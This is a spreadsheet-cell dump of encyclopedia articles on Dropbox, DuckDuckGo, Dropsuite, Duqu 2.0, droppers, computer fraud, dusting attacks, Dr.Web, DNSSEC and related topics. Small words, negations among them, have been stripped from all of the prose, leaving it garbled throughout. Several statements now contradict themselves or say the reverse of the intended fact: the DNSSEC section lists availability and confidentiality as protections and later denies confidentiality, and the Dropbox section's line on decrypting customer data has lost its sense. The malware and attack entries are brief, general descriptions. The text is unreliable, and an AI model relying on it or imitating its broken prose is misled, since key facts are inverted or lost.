terabytes storage space, well additional features, including: advanced sharing controls: when sharing link file folder, users passwords expiration limits. remote wipe: device stolen lost, users remotely wipe dropbox folder device next time comes online. "extended version history": available add-on, makes dropbox keep deleted previous versions files year, significant extension default 30-day recovery time.in november 2013, dropbox announced changes "dropbox business" would enable users connect personal dropbox business dropbox device, folders "properly labeled personal work, come password, contacts, settings, files". furthermore, dropbox announced shared audit logs, remote wipe business administrators, account transfers, features business offering. january 2017, dropbox introduced "smart sync" business enterprise customers, feature lets windows macos users files dropbox folder, download specific files on-demand.similar dropbox basic, dropbox plus users also earn extra space referrals. plus users earn gigabyte referral, gigabytes.dropbox business dropbox's application corporations, adding business-centered functionality teams, including collaboration tools, advanced security control, unlimited file recovery, user management granular permissions, options unlimited storage. large organizations, dropbox offers dropbox enterprise, "highest tier" product offerings, adding domain management tools, assigned dropbox customer support member, help "expert advisors" deployment user training.in july 2016, dropbox announced "adminx" administrator dashboard business customers, offering improved control company files users. june 2017, adminx dashboard given redesign additional administrator functions, log-in durations, custom password strength parameters, granular subdomain verifications specified teams. company partnerships september 2012, facebook dropbox integrated allow users facebook groups share files using dropbox. 2013, samsung pre-loaded dropbox mobile application android devices dropbox provided extra space users owning samsung's devices. november 2014, dropbox announced partnership microsoft integrate dropbox microsoft office applications ios, android applications web. july 2018, dropbox announced partnership salesforce aiming improve brand engagement team productivity. technology dropbox software enables users drop file designated folder. file automatically uploaded dropbox's cloud-based service made available user's computers devices also dropbox software installed, keeping file up-to-date systems. when file user's dropbox folder changed, dropbox uploads pieces file changed, whenever possible.when file folder deleted, users recover within days. dropbox plus users, recovery time extended year, purchasing "extended version history" add-on.dropbox accounts accessed emails replied year automatically deleted.dropbox also offers sync feature, where, instead receiving information data dropbox servers, computers local network exchange files directly other, potentially significantly improving synchronization speeds. sync discovers peers network port 17500 using proprietary discovery protocol developed early dropbox engineer paul bohm 2010.originally, dropbox servers computer apps written python. july 2014, dropbox began migrating performance-critical backend infrastructure go.in september 2012, dropbox's website code base rewritten javascript coffeescript.dropbox originally used amazon's storage system store user files, 2014 2016 gradually moved away amazon hardware, referred "magic pocket", dropbox's description place keep stuff, doesn’t lost, always access it". june 2017, company announced major global network expansion, aiming increase synchronization speeds cutting costs. expansion, starting cities across countries continents, adds "hundreds gigabits internet connectivity transit providers (regional global isps), hundreds peering partners (where exchange traffic directly rather isp)".dropbox uses transfers synchronization stores data advanced encryption standard (aes)-256 encryption.the functionality dropbox integrated third-party applications application programming interface (api).dropbox prevents sharing copyrighted data, checking hash files shared public folders users blacklist copyrighted material. this applies files folders shared users publicly, files kept individual's dropbox folder shared. mailbox march 2013, dropbox acquired mailbox, popular email app, mailbox gentry underwood saying "rather grow mailbox own, we've decided join forces dropbox build together". under deal, developers mailbox joined dropbox, kept mailbox running stand-alone app. acquisition reported cost $100 million.in december 2015, dropbox announced shut-down mailbox. carousel april 2014, dropbox introduced carousel, photo video gallery "combines photos dropbox photos phone, automatically backs ones take them." carousel sorted photos event date. december 2015, dropbox announced shut-down carousel. blog post, drew houston arash ferdowsi explained "we'll taking features carousel back place photos live dropbox app." dropbox paper april 2015, dropbox launched dropbox notes collaborative note-taking service beta testing phase, prompting speculation dropbox planning bring product compete google docs. techcrunch noted dropbox notes appeared version "project composer", previous iteration service roots acquisition hackpad april 2014. october 2015, dropbox announced upcoming launch dropbox paper, collaborative document editor, noted media result development dropbox notes service earlier 2015. dropbox paper entered open beta august 2016, allowing anyone join test product. mobile apps android also released. january 2017, dropbox paper officially launched. aimed businesses, dropbox paper described "one part online document, part collaboration, part task management tool, part content hub" baesman, dropbox's head product, allows importing, editing, collaboration number file types google, microsoft, others". user-created projects users devised number uses mashups technology expand dropbox's functionality. these include: sending files dropbox gmail; using dropbox sync instant messaging chat logs; bittorrent management; password management; remote application launching system monitoring; free hosting service. reception dropbox received several awards, including crunchie award 2010 best internet application, macworld's 2009 editor's choice award software. nominated 2010 webby award, 2010 design awards technica. dropbox's mobile iphone release 2010 among "best apps" selected alex ahlund, former websites focused mobile apps, company's android also selected five "best apps" list compiled 2010 jason hiner zdnet. founders drew houston arash ferdowsi named among entrepreneurs inc. 2011.in 2011, business insider named dropbox world's sixth valuable startup, 2017, publication ranked dropbox eighth valuable startup, valuation billion. described combinator's successful investments date. apple launched cloud storage service later 2011, icloud, hold back dropbox's growth. january 2012, dropbox named startup year techcrunch, 2016, company ranked forbes cloud list. privacy security concerns dropbox subject criticism controversy related multiple incidents, including june 2011 authentication problem accounts accessed several hours without passwords; july 2011 privacy policy update language suggesting dropbox ownership users' data; concerns dropbox employee access users' information; july 2012 email spam recurrence february 2013; leaked government documents june 2013 information dropbox considered inclusion national security agency's prism surveillance program; july 2014 comment whistleblower edward snowden criticizing dropbox's encryption keys available employees; leak million account passwords internet august 2016; january 2017 accidental data restoration incident years-old supposedly deleted files reappeared users' accounts.while dropbox uses encrypt data transit customers, stores data encrypted form end-to-end encryption user controls keys used encrypt stored data. result, dropbox decrypt customers' data chooses offices dropbox headquarters, located francisco, originally market street, expansion china basin landing building july 2011, allowing significant space increase. number employees grew, company needed expansion, february 2014, signed lease buildings brannan street. needing substantial amounts space all, company started shopping remaining available space companies sublease november 2015.dropbox expanded second u.s. office austin, texas february 2014. state texas city austin provided $1.7 million performance-based incentives package dropbox exchange locating office austin.in december 2012, dropbox office dublin, ireland, first office outside united states. also comparison file hosting services comparison file synchronization software comparison online backup services references external links official website business data dropbox, inc.:</t>
  </si>
  <si>
    <t>Dropmyemail</t>
  </si>
  <si>
    <t>dropmyemail cloud-based email backup software offered dropmysite offers cloud storage online backup software. allows users automatically backup emails cloud option view, migrate restore whenever required browser. overview dropmyemail's concept conceived founder john fearon. site launched march 2012 demo asia, launchpad emerging technology singapore. site received seed funding $290,000, undisclosed amounts following 2013.as april 2012, dropmyemail 525,000 users.dropmyemail's backend written ruby rails hosted amazon services cloud infrastructure. most email platforms gmail, hotmail yahoo supported dropmyemail. users also backup email imap settings.dropmyemail uses amazon's storage system store files. business model november 2012, dropmyemail launched business offering soho email mailbox price plans. dropmyemail moved away freemium business model 15-day free trial-based business model.the company launched affiliate program december 2012, meet demands various websites resell dropmyemail's service. references external links official website venture beat: e-mail backup service dropmyemail.com grabs 500k users months (posted april 2012)</t>
  </si>
  <si>
    <t>Dropper (malware)</t>
  </si>
  <si>
    <t>dropper kind trojan designed "install" sort malware (virus, backdoor, etc.) target system. malware code contained within dropper (single-stage) avoid detection virus scanners dropper download malware target machine activated (two stage). also drive-by download references</t>
  </si>
  <si>
    <t>Dropsuite</t>
  </si>
  <si>
    <t>dropsuite limited (formerly branded dropmysite) software platform founded 2011 provides cloud backup, archiving recovery services based singapore. they public company listed australian securities exchange (asx:dse).originally, dropsuite provided website backup services, expanded services include cloud backup office 365, cloud backup suite gmail, email archiving. additional solutions include gdpr responder, ediscovery, insights ransomware protection. corporation company history dropsuite began development name dropmysite september 2011 john fearon’s business website needed backup solution couldn’t find service needs. fearon raised $300,000 first round funding singaporean television show called angel’s gate. 2012, created email backup service called dropmyemail. october 2013, charif elansari took ceo. 2014, smartphone backup service called dropmymobile launched.dropmysite local offices singapore, japan india. entered partnership xpress hosting, web-hosting company mexico getting access 100,000 customers 500,000 domains. dropmysite also announced partnerships cloud paperboy japan. october 2015, godaddy launched cloud backup service websites powered dropmysite.in 2016, company rebranded name dropsuite. 2016, company went public australia securities exchange backdoor listing. 2017, dropsuite entered distribution agreement ingram micro. october 2018, dropsuite entered cloud distribution partnership pax8. 2019, europe announced partnership dropsuite adding dropsuite’s microsoft office cloud backup email backup cloud backup services. management team management team consists people different continents including asia, africa north america australia. chairman theo hnarakis non-executive director bruce tonkin hart charif el-ansari ridley ruth investors dropsuite limited (asx:dse) publicly listed company australian securities exchange. originally, dropmysite privately held technology startup received seed funding crystal horse investments, stanley street labs angel investors. technology backend dropmysite originally based amazon infrastructure. dropsuite provides data backup support many country-locations americas, europe, asia, africa. utilizes amazon services data center support ensure data remains within country borders, needed. user data stored online user agents download install. dropsuite's cloud services protect users' information military-grade 256-bit advanced encryption, allow legal grade email archiving compatible microsoft office and, suite gmail, hosted exchange, open-xchange imap/pop email servers. references</t>
  </si>
  <si>
    <t>Drugfire</t>
  </si>
  <si>
    <t>drugfire multimedia database imaging system automates comparison images bullet cartridge cases, shell casings bullets developed (mnemonic system inc.). multimedia database imaging system allows examiners across united states compare link evidence obtained form spent cartridges ammunition casings. development before drugfire invented, firearm examiners rely technique devised 1920s compare ammunition markings. this involved looking casing microscope examiner compare casings similar markings bullet would likely mean bullets fired gun.from years 1991 1992, devolved drugfire, forensic imaging system allows investigators compare ammunition markings specific shooting databases seemingly unrelated shootings allowed solve numerous cases. notable cases drugfire used oakland police solve murder tommie cain. month cain's shooting death, oakland patrol officer pulled jovan reynolds henry bruce routine traffic stop. officer found .38-caliber revolver car, took evidence felons. when test-fired entered drugfire system, police found bullet matched slug come cain's body. with information, reynolds bruce questioned eventually confessed murder. police investigators said case would likely still open drugfire. references</t>
  </si>
  <si>
    <t>Dubai Uncovered</t>
  </si>
  <si>
    <t>dubai uncovered name leak detailing property ownership dubai. data, originally 2020, revealed 2022.it revealed 274,000 owners 800,000 properties located dubai. these, 191,000 foreigners. data originally obtained center advanced defense studies (c4ads), shared norwegian financial newspaper e24, lead investigation. international media outlets co-operated investigate leak.dubai described "one opaque financial hubs world", popular destinations illicit money. according brussels times, leak revealed huge black hole international anti-money laundering efforts centred [sic] around dubai real estate market". leak revealed members russian elite held properties city, including heavily-sanctioned individuals like ruslan baisarov ramzan kadyrov. additionally, internationally wanted criminals implicated, like daniel kinahan. also bahamas leaks cyprus paperspanama papers pandora papers paradise papers references external links "dubai uncovered" occrp</t>
  </si>
  <si>
    <t>DuckDuckGo</t>
  </si>
  <si>
    <t>duckduckgo (ddg) internet search engine emphasizes protecting searchers' privacy avoiding filter bubble personalized search results. duckduckgo show search results content farms. uses various apis websites show quick results queries traditional links uses help partners (mainly bing) crawler. because anonymity, impossible know many people duckduckgo.the company based paoli, pennsylvania, greater philadelphia employees october 2021. company name reference children's game duck, duck, goose. history duckduckgo founded gabriel weinberg launched february 2008, valley forge, pennsylvania. weinberg entrepreneur previously launched names database, now-defunct social network. initially self-funded weinberg october 2011, "backed union square ventures handful angel investors." union square partner brad burnham stated, invested duckduckgo became convinced possible change basis competition search, time it." addition, trisquel, linux mint, midori browser switched duckduckgo default search engine. duckduckgo gains revenue advertisements affiliate programs. search engine written perl runs nginx, freebsd, linux. duckduckgo built primarily upon search apis various vendors. because this, techcrunch characterized service "hybrid" search engine. weinberg explained beginnings name respect children's game duck, duck, goose. said origin name: "really popped head liked certainly influenced/derived duck duck goose, relation, e.g., metaphor." duckduckgo featured techcrunch's elevator pitch friday 2008, finalist 2008 boss mashable challenge.in 2010, duckduckgo began using privacy differentiate competitors.in july 2010, weinberg started duckduckgo community website (duck.co) allow public report problems, discuss means spreading search engine, request features, discuss open sourcing code. company registered domain name ddg.gg february 2011, acquired duck.com december 2018, used shortened aliases redirect duckduckgo.com. 2012, search engine attracting million searches day. weinberg reported earned us$115,000 revenue 2011 three employees, plus small number contractors. compete.com estimated 266,465 unique visitors site february 2012. april 2011, alexa reported 3-month growth rate 51%. duckduckgo's traffic statistics show august 2012 1,393,644 visits day, average 39,406 visits april 2010 (the earliest data available). lengthy profile november 2012, washington post indicated searches duckduckgo numbered 45,000,000 month october 2012. article concluded: "weinberg's non-ambitious goals make particularly dangerous competitor online. almost everything google bing can't could damage business models, users figure like duckduckgo better, weinberg could damage boys without even really trying. it's asymmetrical digital warfare, backers union square ventures google vulnerable." gnome released 3.10 september 2013, starting version, default search engine duckduckgo.at keynote speech wwdc 2014 september 2014, apple announced duckduckgo would included option search yosemite safari browser. march pale moon browser, starting version 24.4.0, included duckduckgo default search engine, well listed browser's homepage. 2014, duckduckgo released redesigned version beta testers duckduckhack. 2014, duckduckgo officially released redesigned version focused smarter answers refined look. version added many features images, local search, auto-suggest, weather, recipes, more.on november 2014, mozilla added duckduckgo search option firefox 33.1. 2016, project, made duckduckgo default search engine browser 6.0.in july 2016, duckduckgo officially announced extension partnership yahoo! brought features users search engine, including date filtering results additional site links. also partners bing, yandex, wikipedia produce results make features offered. company also confirmed share user information partner companies, always policy.on january 2018, duckduckgo revamped browser extension mobile effort keep internet users safe "beyond search box". revamped extension include tool rating websites based encryption ad-tracking networks well ability block ad-tracking networks. extension also provides terms service summaries terms service; didn't read.in december 2018, reported google transferred ownership domain name duck.com duckduckgo. known price, any, duckduckgo paid domain name.on january 2019, duckduckgo announced address-related searches would powered apple maps, desktop mobile devices.in march 2019, google added duckduckgo default search engine list chrome 73.in july 2021, duckduckgo introduced email forwarding feature email protection, lets users claim "@duck.com" email address generated service. that inbox receive emails strip data trackers forwarding user's private email address. feature launched beta users duckduckgo android apps.as november 2021, million daily searches average.on march 2022, response 2022 russian invasion ukraine, duckduckgo paused partnership yandex search. march 2022, weinberg said tweet duckduckgo down-rank sites associated russian disinformation, move users criticized censorship violation search engine's commitment "unbiased search." duckduckgo defended criticism, saying "the primary utility search engine provide access accurate information. disinformation sites deliberately false information intentionally mislead people directly utility."in april 2022, torrentfreak reported duckduckgo blocked search results major pirating websites, including pirate bay, 1337x fmovies, well video downloading software youtube-dl. however, statement engadget, duckduckgo said pirate youtube-dl never removed search results user searched websites using name address. duckduckgo also said problems "site:" search queries used websites searches said problem fixed.also april, duckduckgo said would protect users tracked google's accelerated mobile pages framework, stating: "when load share google page anywhere duckduckgo apps (ios/android/mac) extensions (firefox/chrome), original publisher's webpage used place google version".in 2022, report bleeping computer security researcher zach edwards found duckduckgo's browser allows microsoft's trackers continue running visiting non-duckduckgo websites, contrary google facebook trackers, blocked. response, weinberg said "this issue occurring browsers pertains non-duckduckgo websites.", adding "when load search results, completely anonymous, including ads", "unfortunately microsoft search syndication agreement prevent microsoft-owned properties. however, continually pushing expect soon.", adding "what we're talking above-and-beyond protection browsers even attempt blocking third-party tracking scripts load party websites. because we're can, users still getting significantly privacy protection duckduckgo would using safari, firefox browsers." features search results duckduckgo's results compilation "over 400" sources according itself, including bing, yahoo! search boss, wolfram alpha, yandex, crawler (the duckduckbot); none google. also uses data crowdsourced sites wikipedia, populate knowledge panel boxes right search results.weinberg refined quality search engine results deleting search results companies believes content mills, ehow, publishes 4,000 articles produced paid freelance writers, weinberg states "low-quality content designed specifically rank highly google's search index". duckduckgo also filters pages substantial advertising. instant answers addition indexed search results, duckduckgo displays relevant results, called instant answers, search page. these instant answers collected either third party apis static data sources like text files. instant answers called zeroclickinfo intention behind provide users searching search result page click results find looking for. instant answers created maintained community 1,500 open source contributors. this community come known duckduckhack. july 2019, 1236 instant answers active.in duckduckhack documentation, four types instant answers described: goodies, spices, fatheads, longtails. these types instant answer extensions differentiated data retrieved. goodies retrieve data third party api, whereas spices goodies instead form aforementioned static data sources, text files json files. fathead instant answers key-value answers hosted duckduckgo's backend. fathead key-value pairs function similarly trigger showing respective instant answer. longtail instant answers full text queries duckduckgo database articles. paragraphs snippets matching articles returned, section matches user's query highlighted. access august 2010, duckduckgo introduced anonymous searching, including exit enclave, search engine traffic using network enabling access "tor hidden service" (onion service). 3g2upl4pq6kufc4m.onion (accessing link help) duckduckgo onion service tor. this allows anonymity routing traffic series encrypted relays. weinberg stated: believe fits right line privacy policy. using ddg, anonymous searching. encrypted homepage, encrypted well."in july 2021, duckduckgo introduced onion service, link: duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion (accessing link help). bangs duckduckgo includes "!bang" keywords, give users ability search specific third-party websites using site's search engine applicable. august 2020, 13,564 "bangs" diverse range internet sites available. december 2018, around 2,000 "bangs" deleted. some deleted broken, others, searches pirated content sites, deleted liability reasons. business model duckduckgo earns revenue serving yahoo-bing search alliance network affiliate relationships amazon ebay. privacy-focused search engine, served duckduckgo based keywords terms search query.the company supports charitable organizations work improve privacy, 2021 donated us$1m causes donated $3,650,000 previous decade. major donations 2021 included $200,000 center information technology policy, $150,000 electronic frontier foundation, $75,000 european digital rights (edri) $75,000 markup. source code some duckduckgo's source code free software hosted github apache license, core proprietary. duckduckgo also hosts duckduckhack, sister site organizing open source contributions community projects. search engine's instant answers open source maintained github, anyone view source code. august 2017, duckduckhack placed maintenance mode; such, pull requests fixes approved. reception june 2011 article, harry mccracken time commended duckduckgo, comparing favorite hamburger restaurant, in-n-out burger: feels like early google, stripped-down home page. just in-n-out lattes asian salads sundaes scrambled eggs, news blogs books images. there's auto-completion instant results. offers core search—mostly "ten blue links" approach that's still really useful, matter critics quality, saying weinberg figured return relevant results google's mighty search team. duckduckgo really good bringing back useful sites. feels meaty straightforward filler-free bare-bones approach cited quote since changed; instance, duckduckgo auto-completion, instant results, news tab. mccracken included site time's list best websites 2011."thom holwerda, reviewed search engine osnews, praised privacy features shortcuts site-specific searches well criticizing google "track[ing] pretty much everything do", particularly risk information subject u.s. government subpoena. 2012, response accusations monopoly, google identified duckduckgo competitor. weinberg reportedly "pleased entertained" acknowledgment.in november 2019, twitter jack dorsey revealed preference using duckduckgo search engine rather google, stating, love @duckduckgo. default search engine now. even better!". conservative political commentators shapiro bongino also endorsed duckduckgo. traffic june 2013, duckduckgo indicated seen significant traffic increase; according company's twitter account, monday, june 2013, three million daily direct searches. average 2013, million daily direct searches. some relate claim exposure prism fact programs operated national security agency (nsa) leaked edward snowden. danny sullivan wrote search engine land despite search engine's growth "it's grown anywhere near amount reflect substantial even mildly notable switching searching public" reasons privacy, concluded cares about "private" search". response, caleb garling francisco chronicle argued: think thesis suffers failures logic" traffic increase occurred lack widespread awareness existence duckduckgo.later september 2013, search engine million searches june 2015, million searches day. november 2017, duckduckgo million searches day. january 2019, duckduckgo record billion monthly searches; november year, million searches day. november 2021, duckduckgo receiving 101,277,289 queries average. january 2021, record 102.2 million daily searches achieved. record 108,882,447 daily searches november 2021.internal surveys duckduckgo found users duckduckgo wide variety political leanings. desktop browser april 2022, duckduckgo released duckduckgo beta, privacy-oriented desktop browser automatically blocks trackers cookie consent pop-ups. duckduckgo chose webkit rendering engine underpins apple's safari browser rather fork called blink used chromium, opera brave. beah burger-lenehan, product manager stated: building everything else scratch. beyond rendering, code written duckduckgo engineers privacy, security, simplicity front mind. this means cruft clutter accumulated browsers years, code design, giving modern look feel faster speed." also comparison search engines list search engines names database timeline search engines references external links official website</t>
  </si>
  <si>
    <t>Duqu 2.0</t>
  </si>
  <si>
    <t>duqu version malware reported 2015 infected computers hotels austria switzerland sites international negotiations iran nuclear program economic sanctions. malware, infected kaspersky months without knowledge, believed work unit 8200. york times alleges breach kaspersky 2014 allowed israel notify russian hackers using kaspersky software retrieve sentitive data.kaspersky discovered malware, symantec confirmed findings. malware variant duqu, duqu variant stuxnet. software "linked israel", according guardian. software used three zero-day exploits, would required funding organization consistent government intelligence agency.according kaspersky, "the philosophy thinking “duqu 2.0” group generation ahead anything seen advanced persistent threats world." also negotiations iran nuclear deal framework unit 8200 references</t>
  </si>
  <si>
    <t>Computer fraud</t>
  </si>
  <si>
    <t>computer fraud cybercrime using computer take alter electronic data, gain unlawful computer system. united states, computer fraud specifically proscribed computer fraud abuse act, criminalizes computer-related acts federal jurisdiction.types computer fraud include: distributing hoax emails accessing unauthorized computers engaging data mining spyware malware hacking computer systems illegally access personal information, credit cards social security numbers sending computer viruses worms intent destroy ruin another party's computer system.phishing, social engineering, viruses, ddos attacks fairly well-known tactics used disrupt service gain access another's network, list inclusive. notable incidents melissa virus/worm melissa virus appeared thousands email systems march 1999. disguised instance important message colleague friend. virus designed send infected email first email addresses users’ microsoft outlook address book. each infected computer would infect additional computers, turn would infect another computers. virus proliferated rapidly exponentially, resulting substantial interruption impairment public communications services. many system administrators disconnect computer systems internet. companies microsoft, intel, lockheed martin lucent technologies forced shut email gateways vast number emails virus generating. after investigation conducted multiple branches government enforcement, melissa virus/worm attributed david smith, 32-year-old jersey programmer, eventually charged computer fraud. smith first people ever prosecuted writing virus. sentenced months federal prison fined $5,000. addition, also ordered serve three years supervised release completion prison sentence. investigation involved members jersey state police high technology crime unit, federal bureau investigation (fbi), justice department’s computer crime intellectual property section, defense criminal investigative service. also information security information technology audit references external links information security computer fraud cases investigations cornell law: computer internet fraud</t>
  </si>
  <si>
    <t>Dusting attack</t>
  </si>
  <si>
    <t>dusting attack attack cryptocurrency wallet sends tiny amounts cryptocurrency (known "dust") wallet order uncover identity wallet's owner. information used obstruct receiving legitimate payments phishing scams.victims sent token wallet airdrop. when victim attempts cash token, sender able access wallet smart contract attached token. references</t>
  </si>
  <si>
    <t>Dr.Web</t>
  </si>
  <si>
    <t>dr.web software suite developed russian anti-malware company doctor web. first released 1992, became first anti-virus service russia.the company also offers anti-spam solutions used yandex scan e-mail attachments. also features add-on major browsers checks links online version web.dr.web withdrawn tests virus bulletin vb100% around 2008 stating believe virus scans viruses different subject real world malware attacks. critics, reviews reliability staunch anti-adware policy software developers complaints dr.web treated virus free applications "virus" receive responds dr.web contact dr.web resolve issue. notable discoveries flashback trojan dr.web discovered trojan backdoor.flashback variant affected 600,000 macs. trojan.skimer.18 dr.web discovered trojan.skimer.18, trojan works like software skimmer. trojan intercept transmit bank card information processed atms well data stored card code. linux.encoder.1 dr.web discovered ransomware linux.encoder.1 affected 2,000 linux users. linux.encoder.2 discovered later turned earlier version ransomware. trojan.skimer discovery attacks doctor offices doctor received threat supposedly trojan writers criminal organization sponsoring malware's development promotion: march 2014, arson attacks carried igor daniloff's anti-virus laboratory petersburg, company received second threat. doctor released statement company considers duty provide users ultimate protection encroachments cybercriminals consequently, efforts aimed identifying studying threats shield. also antivirus software comparison antivirus software comparison computer viruses references external links official website english)</t>
  </si>
  <si>
    <t>Domain Name System Security Extensions</t>
  </si>
  <si>
    <t>domain name system security extensions (dnssec) suite extension specifications internet engineering task force (ietf) securing data exchanged domain name system (dns) internet protocol (ip) networks. protocol provides cryptographic authentication data, authenticated denial existence, data integrity, availability confidentiality. overview original design domain name system include security features. conceived scalable distributed system. domain name system security extensions (dnssec) attempt security, maintaining backward compatibility. request comments 3833 documents known threats dns, solutions dnssec. dnssec designed protect applications using accepting forged manipulated data, created cache poisoning. answers dnssec protected zones digitally signed. checking digital signature, resolver able check information identical (i.e. unmodified complete) information published zone owner served authoritative server. while protecting addresses immediate concern many users, dnssec protect data published dns, including text records (txt) mail exchange records (mx), used bootstrap security systems publish references cryptographic certificates stored certificate records (cert records, 4398), fingerprints (sshfp, 4255), ipsec public keys (ipseckey, 4025), trust anchors (tlsa, 6698), encrypted client hello (svcb/https records ech, dnssec provide confidentiality data; particular, dnssec responses authenticated encrypted. dnssec protect attacks directly, though indirectly provides benefit (because signature checking allows potentially untrustworthy parties).other standards (not dnssec) used secure bulk data (such zone transfer) sent servers. documented ietf 4367, users developers make false assumptions names, assuming company's common name plus ".com" always domain name. dnssec cannot protect false assumptions; authenticate data truly available domain owner.the dnssec specifications (called dnssec-bis) describe current dnssec protocol great detail. 4033, 4034, 4035. with publication rfcs (march 2005), earlier rfc, 2535 become obsolete. widely believed securing critically important securing internet whole, deployment dnssec specifically hampered january 2010) several difficulties: need design backward-compatible standard scale size internet prevention "zone enumeration" desired deployment dnssec implementations across wide variety servers resolvers (clients) disagreement among implementers top-level domain root keys overcoming perceived complexity dnssec dnssec deployment operation dnssec works digitally signing records lookup using public-key cryptography. correct dnskey record authenticated chain trust, starting verified public keys root zone trusted third party. domain owners generate keys, upload using control panel domain-name registrar, turn pushes keys secdns zone operator (e.g., verisign .com) signs publishes dns. resource records implemented several resource records. implement dnssec, several record types created adapted dnssec: rrsig (resource record signature) contains dnssec signature record set. resolvers verify signature public key, stored dnskey record. dnskey contains public resolver uses verify dnssec signatures rrsig records. (delegation signer) holds name delegated zone. references dnskey record sub-delegated zone. record placed parent zone along delegating records. nsec (next secure record) contains link next record name zone lists record types exist record's name. resolvers nsec records verify non-existence record name type part dnssec validation. nsec3 (next secure record version contains links next record name zone hashed name sorting order) lists record types exist name covered hash value first label nsec3 record's name. these records used resolvers verify non-existence record name type part dnssec validation. nsec3 records similar nsec records, nsec3 uses cryptographically hashed record names avoid enumeration record names zone. nsec3param (next secure record version parameters) authoritative servers record calculate determine nsec3 records include responses dnssec requests non-existing names/types.when dnssec used, answer lookup contains rrsig record, addition record type requested. rrsig record digital signature answer resource record set. digital signature verified locating correct public found dnskey record. nsec nsec3 records used provide cryptographic evidence non-existence resource record (rr). record used authentication dnskeys lookup procedure using chain trust. nsec nsec3 records used robust resistance spoofing. algorithms dnssec designed extensible attacks discovered existing algorithms, ones introduced backward-compatible fashion. following table defines, april 2013, security algorithms often used: lookup procedure from results lookup, security-aware resolver determine whether authoritative name server domain queried supports dnssec, whether answer receives secure, whether sort error. lookup procedure different recursive name servers many isps, stub resolvers included default mainstream operating systems. microsoft windows uses stub resolver, windows server 2008 windows particular non-validating dnssec-aware stub resolver. recursive name servers using chain trust model, delegation signer (ds) record parent domain (dns zone) used verify dnskey record subdomain, contain records verify subdomains. recursive resolver name server wants addresses record and/or aaaa records) domain "www.example.com". process starts security-aware resolver sets "do" ("dnssec ok") flag query. since extended flag bits defined extension mechanisms (edns), dnssec transactions must support edns. edns support also needed allow much larger packet sizes dnssec transactions require. when resolver receives answer normal lookup process, checks make sure answer correct. ideally, security-aware resolver would start verifying dnskey records root. then would records "com" top-level domain found root verify dnskey records "com" zone. from there, would record "example.com" subdomain "com" zone, were, would record verify dnskey record found "example.com" zone. finally, would verify rrsig record found answer records "www.example.com".there several exceptions example. first, "example.com" support dnssec, rrsig record answer record "example.com" "com" zone. record "example.com", rrsig record reply, something wrong maybe middle attack going stripping dnssec information modifying records. could broken security-oblivious name server along stripped flag query rrsig record answer. could configuration error. next, domain name named "www.example.com", case instead returning rrsig record answer, either nsec record nsec3 record. these "next secure" records allow resolver prove domain name exist. nsec/nsec3 records rrsig records, verified above. finally, "example.com" zone implements dnssec, either "com" zone root zone not, creating "island security" needs validated way. july 2010, deployment dnssec root completed. .com domain signed valid security keys secure delegation added root zone april 2011. stub resolvers stub resolvers "minimal resolvers recursive query mode offload work resolution recursive name server." stub resolver simply forward request recursive name server, authenticated data (ad) response "hint find whether recursive name server able validate signatures data answer authority sections response." microsoft windows uses stub resolver, windows server 2008 windows particular non-validating ad-bit-aware stub resolver.a validating stub resolver also potentially perform signature validation setting checking disabled (cd) query messages. validating stub resolver uses perform recursive authentication. using validating stub resolver gives client end-to-end security domains implementing dnssec, even internet service provider connection trusted. non-validating stub resolvers must rely external dnssec validation services, controlled user's internet service provider public recursive name server, communication channels name servers, using methods tls. trust anchors authentication chains able prove answer correct, needs know least record correct sources dns. these starting points known trust anchors typically obtained operating system trusted source. when dnssec originally designed, thought trust anchor would needed root. root anchors first published july 2010.an authentication chain series linked dnskey records, starting trust anchor authoritative name server domain question. without complete authentication chain, answer lookup cannot securely authenticated. signatures zone signing limit replay attacks, normal values caching purposes, additional timestamps rrsig records limit validity signature. unlike values relative records sent, timestamps absolute. this means security-aware resolvers must clocks fairly closely sync, within minutes. these timestamps imply zone must regularly re-signed re-distributed secondary servers, signatures rejected validating resolvers. management dnssec involves many different keys, stored dnskey records, sources form trust anchors. order allow replacement keys, rollover scheme required. typically, involves first rolling keys dnskey records, addition existing keys. then, safe assume time live values caused caching keys passed, keys used. finally, safe assume caching records using keys expired, dnskey records deleted. this process complicated things keys trust anchors, root, require update operating system. keys dnskey records used different things typically different dnskey records used each. first, signing keys (ksk) used sign dnskey records. second, zone signing keys (zsk) used sign records. since zsks complete control particular zone, switched easily often. result, zsks much shorter ksks still offer level protection reducing size rrsig/dnskey records. when created, record must transferred parent zone published there. records message digest instead complete order keep size records small. this helpful zones .com domain, large. procedure update keys parent zone also simpler earlier dnssec versions required dnskey records parent zone. dane working group dns-based authentication named entities (dane) ietf working group goal developing protocols techniques allow internet applications establish cryptographically secured communications tls, dtls, smtp, s/mime based dnssec. protocols enable additional assurances constraints traditional model based public infrastructure. they also enable domain holders assert certificates themselves, without reference third-party certificate authorities. support dnssec stapled certificates enabled google chrome later removed. mozilla firefox, support provided add-on native support currently awaiting someone start working history critical fundamental internet service, 1990 steve bellovin discovered serious security flaws research securing began, progressed dramatically paper made public 1995. initial 2065 published ietf 1997, initial attempts implement specification revised (and believed fully workable) specification 1999 ietf 2535. plans made deploy dnssec based 2535. unfortunately, ietf 2535 specification significant problems scaling full internet; 2001 became clear specification unusable large networks. normal operation servers often sync parents. this usually problem, dnssec enabled, out-of-sync data could effect serious self-created denial service. original dnssec required complex six-message protocol data transfers perform changes child (dns child zones send data parent, parent sign record, send signatures back child child store record). also, public changes could absurd effects; example, ".com" zone changed public key, would send million records (because would need update signatures children). thus, dnssec defined 2535 could scale internet. ietf fundamentally modified dnssec, called dnssec-bis necessary distinguish original dnssec approach 2535. this version uses "delegation signer (ds) resource records" provide additional level indirection delegation points parent child zone. approach, child's master public changes, instead messages every record child, simple message: child sends public parent (signed, course). parents simply store master public child; much practical. this means little data pushed parent, instead massive amounts data exchanged parent children. this mean clients little work verifying keys. more specifically, verifying zone's rrset requires signature verification operations instead required 2535 (there impact number signatures verified types rrsets). most view small price pay, since makes dnssec deployment practical. authenticating nxdomain responses nsec cryptographically proving absence domain requires signing response every query non-existent domain. this problem online signing servers, keep keys available online. however, dnssec designed around using offline computers sign records zone-signing-keys could kept cold storage. this represents problem trying authenticate responses queries non-existent domains since impossible pre-generate response every possible hostname query. initial solution create nsec records every pair domains zone. thus client queried record non-existent k.example.com, server would respond nsec record stating nothing exists a.example.com z.example.com. however, leaks information zone traditional unauthenticated nxdomain errors exposes existence real domains. preventing domain walking nsec3 records (rfc 5155) created alternative hashes name instead listing directly. over time, advancements hashing using gpus dedicated hardware meant nsec3 responses could cheaply brute 